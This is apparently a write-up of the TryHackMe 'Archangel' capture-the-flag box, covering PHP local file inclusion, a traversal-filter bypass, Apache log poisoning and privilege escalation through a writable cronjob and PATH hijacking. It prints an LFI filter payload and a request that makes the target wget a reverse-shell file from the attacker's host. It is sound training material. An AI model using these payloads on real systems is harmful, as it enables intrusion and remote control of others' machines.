Hello, everyone!
Back with a write-up on TryHackMe Archangel CTF, a fairly easy Linux box involving LFI, Apache Log Poisoning and Linux Privilege Escalation by taking advantage of Cronjobs and PATH Variable.
Enumeration
Let’s start the enumeration with nmap.
root@ip-10–10–80–17:~# nmap -sV -sC 10.10.213.254
Starting Nmap 7.60 ( https://nmap.org ) at 2021–02–06 21:36 GMT
Nmap scan report for mafialive.thm (10.10.213.254)
Host is up (0.00078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
| 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_ 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/test.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 02:03:49:4F:A8:3F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds
Not much. Nmap revealed an Ubuntu machine with port 22 and 80 open. At this point the first thing, I’ve done, was to run gobuster against the target, but apart from the /flag directory (which was a rabbit hole), nothing of interest emerged.
So, I fired up Firefox, to have a look at the landing page of the site. Neither on the main page were much to see but the support email revealed the hostname of the machine, which really comes in handy.
Adding the above domain on our /etc/hosts and retriggering gobuster, this time rewards us with much more info.
gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/common.txt -x tar,php,txt,cgi
Bingo! Robots.txt shows the way and reveals that we should have a look at the test.php page.
PHP LFI
The page is really simple. A php page with a button which upon clicking it reveals a quote used on “Mr.Robot” series.
What caught my attention was the way that mrrobot.php page is appearing when requested. A useful page with a PHP LFI cheat sheet can be found here.
The payload that is going to be used here, in order to read the contents of the test.php file is the following:
“ ?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php”
The above request contains a PHP Wrapper, which is reading the source that we provided (in our case the test.php) and outputs its contents encoded on base64. So, essentially, as soon as we decode the above hash, we will get the contents of the test.php. There are tons of ways for decoding the hash, in my case, I chose the Linux built-in command “base64”. Tools such as CyberChef could make the work just fine as well.
If we take a look on the code above, we can see that there is a control in place for rejecting path/directory traversal attacks. However, this control can be easy bypassed if instead of ‘../..’ , we use something like ‘.././..’ . A cheat sheet with more options can be found here.
At the beginning of the enumeration, we found out that we are dealing with an Apache server, so if we can redirect ourselves to the /var/log/apache2 /access.log, we would be able to perform a Apache Log Poisoning in order to gain access to the machine.
Apache Log Poisoning
Indeed, if we replace the previous request on our browser with
we can see on our browser the Apache Server Access logs.
Hint: To get a more comprehensive view of the logs, right-click on the browser and select View Page Source.
Now, that we have verified that accessing Apache Logs is successful, we can work on the Log Poisoning. The first thing that we should work on is to add the following piece of php code on the User-Agent Header of our request in order to be able to pass commands (RCE exploit) along with our browser requests.
After that I used a php reverse shell, adapted on my needs, started a Simple Python Server and used the following request in order to download the file on the target’s machine:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././log/apache2/access.log&cmd=wget http://10.10.80.17:5555/rs.php
We can verify if our reverse shell was successfully downloaded on the target by sending on the logs a ‘ls -la’ command. Next, we should launch our NetCat to listen on the port that was configured on the reverse shell and request the following page from the server in order to get our shell.
User Privilege Escalation
We managed to get our way into the server as www-data user. If we enumerate the server a little either manually or by using a tool such as Linpeas.sh, soon enough we will come across a cronjob ran by archangel user.
Unfortuantely for the archangel user, www-data user can modify that script and can help us to take advantage of the crontask in order to escalate our user privileges. A very good article of abusing crontasks can be found here. The exploit is really easy. All we have to do is to modify the script so that it will spawn a bash reverse shell, trigger our NetCat session once more, and wait for the crontask to be executed. Boom! We are archangel now!
Root Privilege Escalation
Digging a little into the Archangel’s home directory, we came across an executable named backup. Upon execution, we can see that the executable is using the cp command, however without containing its full path. This is a really bad practice as an attacker can take advantage of this and exploit it really simply as we will see below.
All, we will have to do is to create an executable cp file on the /tmp directory, which will contain in fact the “/bin/bash” command and add the /tmp directory into machines $PATH. As soon as, we re-run the backup executable, we get our root shell.
That’s all for today. I hope you enjoyed my write-up, as much as I enjoyed writing it.
See you next time and keep hacking! :)
